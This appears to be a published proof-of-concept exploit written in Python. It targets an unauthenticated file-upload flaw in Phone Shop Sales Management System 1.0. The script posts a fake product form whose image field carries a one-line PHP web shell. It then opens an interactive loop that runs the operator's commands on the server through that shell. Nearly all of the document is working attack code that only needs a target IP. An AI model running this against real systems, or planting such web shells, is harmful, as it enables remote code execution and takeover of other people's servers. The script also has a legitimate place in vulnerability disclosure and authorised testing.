# Exploit Title: Phone Shop Sales Management System - Arbitrary File Upload (Unauthenticated) # Date: 20/04/21 # Exploit Author: Richard Jones # Vendor Homepage: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html # Version: 1.0 # Tested on: Windows 10 build 19041 + xampp 3.2.4 import requests import sys IP="127.0.0.1" # CHANGE ME ADDURL=f"http://{IP}/osms/Execute/ExAddProduct.php" CALLSHELLURL=f"http://{IP}/osms/assets/img/Product_Uploaded/rev.php" s = requests.Session() def postShell(): data = { "ProductName":"1", "BrandName":"1", "ProductPrice":1, "Quantity":"1", "TotalPrice":1, "DisplaySize":"1", "OperatingSystem":"1", "Processor":"1", "InternalMemory":"1", "RAM":"1", "CameraDescription":"1", "BatteryLife":"1", "Weight":"1", "Model":"1", "Dimension":"1", "date2":"1", "Description":"1", "_wysihtml5_mode":"1", } fileData = { 'ProductImage':("rev.php","<?php system($_GET['c']);?>", "application/octet-stream")} r = s.post(ADDURL, files=fileData, data=data) if "The product is successfully added" in r.text: return True else: return False def runWebShell(): try: while True: cmd=input("\033[32;1m" +"$: "+ "\033[0m") if cmd == "exit": sys.exit() r = s.get(f"{CALLSHELLURL}?c={cmd}", verify=False) if r.status_code == 200: print(r.text) else: raise Exception("Cmd error") except KeyboardInterrupt(): sys.exit() def banner(): ban = r"""__________.__ _________.__ _________ .__ _____ _________ \______ \ |__ ____ ____ ____ / _____/| |__ ____ ______ / _____/____ | | ____ ______ / \ / _____/ | ___/ | \ / _ \ / \_/ __ \ \_____ \ | | \ / _ \\____ \ \_____ \\__ \ | | _/ __ \ / ___/ / \ / \ \_____ \ | | | Y ( <_> ) | \ ___/ / \| Y ( <_> ) |_> > / \/ __ \| |_\ ___/ \___ \ / Y \ / \ |____| |___| /\____/|___| /\___ > /_______ /|___| /\____/| __/ /_______ (____ /____/\___ >____ > \____|__ / /\ /_______ / /\ \/ \/ \/ \/ \/ |__| \/ \/ \/ \/ \/ \/ \/ \/ """ return ban def main(): print("\033[34;1m" + banner() + "\033[0m") print("\033[32;1m" + "Created by Richard Jones 20/04/2021"+ "\033[0m" + "\n") print("\033[72;1m" +"[+] Sending WebShell..."+ "\033[0m") if postShell(): print("\033[72;1m" +"[+] Calling WebShell..."+ "\033[0m") runWebShell() if __name__ == "__main__": main()